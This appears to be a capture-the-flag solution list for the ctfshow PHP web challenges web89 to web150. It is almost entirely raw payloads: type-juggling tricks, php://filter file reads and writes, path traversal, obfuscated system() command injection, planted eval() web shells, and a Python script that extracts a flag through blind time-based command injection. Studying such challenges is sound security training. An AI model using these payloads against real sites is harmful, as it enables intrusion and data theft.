[huayang]web89

?num[]=

web90

?num=4476.

web91

?cmd=%Aphp

web92

?num=0x117c

web93

?num=010574

web94

?num=4476.0001

web95

?num=+010574

web96

?u=../html/flag.php

web97

a[]=&b[]=

web98

flag=xx&HTTP_FLAG=flag

web99

?n=1.php post：content=<?php eval($_GET[1]);?>

多点几次

访问1.php

web102-103

?v2=005044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php
post：v1=hex2bin

点一次就行了别点多了

web104

get:
?v2[]=
post:
v1[]=

web105

get:
?suces=flag
post:
error=suces

web106

get:
?v2[]=2
post:
v1[]=1

web107

md5特性

get:
?v3=520610708
post:
v1=flag=0

web108

?c=a%00778

web109

Exception 异常处理类 http://c.biancheng.net/view/6253.html

?v1=Exception&v2=system('nl fl36dg.txt')

web110

?v1=FilesystemIterator&v2=getcwd

访问即可

web111

 ?v1=ctfshow&v2=GLOBALS

web112

?file=php://filter/resource=flag.php

web113

?file=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/p
roc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/pro
c/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/
self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/se
lf/root/proc/self/root/var/www/html/flag.php

web114

?file=php://filter/resource=flag.php

web115

/?num=%0C36

web123、125、126

?$fl0g=flag_give_me;                           #GET
CTF_SHOW=6&CTF[SHOW.COM=6&fun=eval($a[0])      #POST  

web127

?ctf show=ilove36d

web128

?f1=_&f2=get_defined_vars

web129

?f=php://filter/read=convert.base64-encode|ctfshow/resource=flag.php

方法二 目录穿越

?f=/ctfshow/../../../../var/www/html/flag.php

web130

payload:
post:
f=ctfshow

web131

import requests
url="http://a6def013-abd1-4e17-881d-90c5d3bcc7ad.chall.ctf.show/"
data={
	'f':'very'*250000+'36Dctfshow'
}
r=requests.post(url,data=data)
print(r.text)

web132

/admin

?username=admin&password=1&code=admin

web134

?_POST[key1]=36d&_POST[key2]=36d

web136

当前目录

?c= ls |tee 1

根目录

?c= ls /|tee 1

直接读取

?c=nl  /f149_15_h3r3|tee 1

web137

ctfshow=ctfshow::getflag

web138

ctfshow[0]=ctfshow&ctfshow[1]=getFlag

web139

问就是羽师傅的

import requests
import time
import string
str=string.digits+string.ascii_lowercase+"-"
result=""
key=0
for j in range(1,45):
	print(j)
	if key==1:
		break
	for n in str:
		payload="if [ `cat /f149_15_h3r3|cut -c {0}` == {1} ];then sleep 3;fi".format(j,n)
		#print(payload)
		url="http://12acd425-0054-4af3-be5e-fe5aa467c5b3.chall.ctf.show/?c="+payload
		try:
			requests.get(url,timeout=(2.5,2.5))
		except:
		    result=result+n
		    print(result)
		    break

web140

 f1=usleep&f2=usleep

web141

?v1=1&v3=-(~%8c%86%8c%8b%9a%92)(~%8b%9e%9c%df%99%d5)-&v2=1

web142

?v1=0

web143

?v1=1&v3=*("%0c%06%0c%0b%05%0d"^"%7f%7f%7f%7f%60%60")("%0b%01%03%00%06%00"^"%7f%60%60%20%60%2a")*&v2=1

web144

?v1=1&v3=-&v2=(~%8c%86%8c%8b%9a%92)(~%8b%9e%9c%df%99%d5)

web145

?v1=1&v3=?(~%8c%86%8c%8b%9a%92)(~%8b%9e%9c%df%99%d5):&v2=1

web146

?v1=1&v3===(~%8c%86%8c%8b%9a%92)(~%8b%9e%9c%df%99%d5)||&v2=1

web147

get
?show=;};system('grep flag flag.php');/*
post
ctf=%5ccreate_function

web148

?code=$哈="`{{{"^"?<>/";${$哈}[哼](${$哈}[嗯]);&哼=system&嗯=tac f*

web149

?ctf=index.php
show=<?php eval($_POST[a]);?>

a=system('ls /');

a=system('nl /ctfshow_fl0g_here.txt');

web150

[/huayang]

FROM：浅浅淡淡[hellohy]